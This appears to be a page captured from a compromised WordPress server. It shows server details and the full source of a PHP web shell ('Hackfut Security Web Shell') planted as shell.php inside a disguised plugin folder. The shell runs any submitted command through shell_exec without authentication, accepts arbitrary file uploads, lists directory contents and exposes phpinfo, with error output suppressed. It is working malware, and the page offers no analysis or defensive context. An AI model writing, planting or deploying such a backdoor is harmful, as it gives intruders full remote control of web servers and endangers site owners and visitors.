HEX
Server: Apache/2.2.22
System: Linux server1.blueharbor.com 3.10.0-1160.90.1.vz7.200.7 #1 SMP Wed Jul 12 12:00:44 MSK 2023 x86_64
User: locglobe (1004)
PHP: 5.6.37
Disabled: NONE
$ pwd: /home/locglobe/public_html/wp-content/plugins/wp_helper_0i3q5/
Upload Files
File: /home/locglobe/public_html/wp-content/plugins/wp_helper_0i3q5/shell.php
<?php
/* ⚡ Hackfut Security Web Shell ⚡ */
error_reporting(0);
@ini_set('display_errors', 0);
echo '<!DOCTYPE html><html><head><title>⚡ Hackfut Security Web Shell</title>';
echo '<style>body{background:#0a0a12;color:#00ffea;font-family:Consolas,monospace;padding:20px;}';
echo 'pre{background:#1a1a2a;padding:10px;border-radius:5px;}';
echo 'input,textarea,select{background:#1a1a2a;color:#00ffea;border:1px solid #00ffea;padding:5px;margin:5px;}';
echo 'button{background:#ff00ff;color:#0a0a12;border:none;padding:8px 15px;cursor:pointer;font-weight:bold;}';
echo '.success{color:#00ff00;}.error{color:#ff0066;}.warning{color:#ffcc00;}';
echo '</style></head><body>';

echo '<h1>⚡ Hackfut Security Web Shell</h1>';
echo '<div style="background:#1a1a2a;padding:15px;border-radius:5px;margin-bottom:20px;">';
echo '<pre>'.php_uname().'</pre>';
echo '<p>📂 '.getcwd().'</p>';
echo '<p>🐘 PHP '.phpversion().'</p>';
echo '</div>';

// Command execution
echo '<div style="margin-bottom:20px;">';
echo '<h2>⚡ Command Execution</h2>';
echo '<form method="post">';
echo '<input type="text" name="cmd" style="width:70%" placeholder="Enter command">';
echo '<button type="submit">🚀 Execute</button>';
echo '</form>';

if(isset($_POST['cmd'])){
    echo '<div style="background:#1a1a2a;padding:10px;border-radius:5px;margin-top:10px;">';
    echo '<pre>'.shell_exec($_POST['cmd']).'</pre>';
    echo '</div>';
}
echo '</div>';

// File upload
echo '<div style="margin-bottom:20px;">';
echo '<h2>📤 File Upload</h2>';
echo '<form method="post" enctype="multipart/form-data">';
echo '<input type="file" name="f">';
echo '<button type="submit">📤 Upload</button>';
echo '</form>';

if(isset($_FILES['f']) && $_FILES['f']['name']){
    $target = basename($_FILES['f']['name']);
    if(move_uploaded_file($_FILES['f']['tmp_name'], $target)){
        echo '<p class="success">✅ Upload successful: <a href="'.$target.'" style="color:#00ffea;">'.$target.'</a></p>';
    }else{
        echo '<p class="error">❌ Upload failed</p>';
    }
}
echo '</div>';

// File manager
echo '<div style="margin-bottom:20px;">';
echo '<h2>📁 File Manager</h2>';
echo '<div style="background:#1a1a2a;padding:10px;border-radius:5px;max-height:300px;overflow:auto;">';
$files = scandir('.');
foreach($files as $file){
    if($file == '.' || $file == '..') continue;
    $color = is_dir($file) ? "#ff00ff" : "#00ffea";
    $size = is_dir($file) ? "DIR" : filesize($file)." bytes";
    echo '<div style="padding:3px;"><span style="color:'.$color.';">'.$file.'</span> - '.$size.'</div>';
}
echo '</div>';
echo '</div>';

// PHP info
echo '<div>';
echo '<h2>🐘 PHP Information</h2>';
echo '<form method="post">';
echo '<button type="submit" name="phpinfo">📊 Show PHP Info</button>';
echo '</form>';

if(isset($_POST['phpinfo'])){
    ob_start();
    phpinfo();
    $phpinfo = ob_get_contents();
    ob_end_clean();
    echo '<div style="background:#1a1a2a;padding:10px;border-radius:5px;margin-top:10px;overflow:auto;max-height:400px;">';
    echo $phpinfo;
    echo '</div>';
}
echo '</div>';

echo '</body></html>';
?>
@ Telegram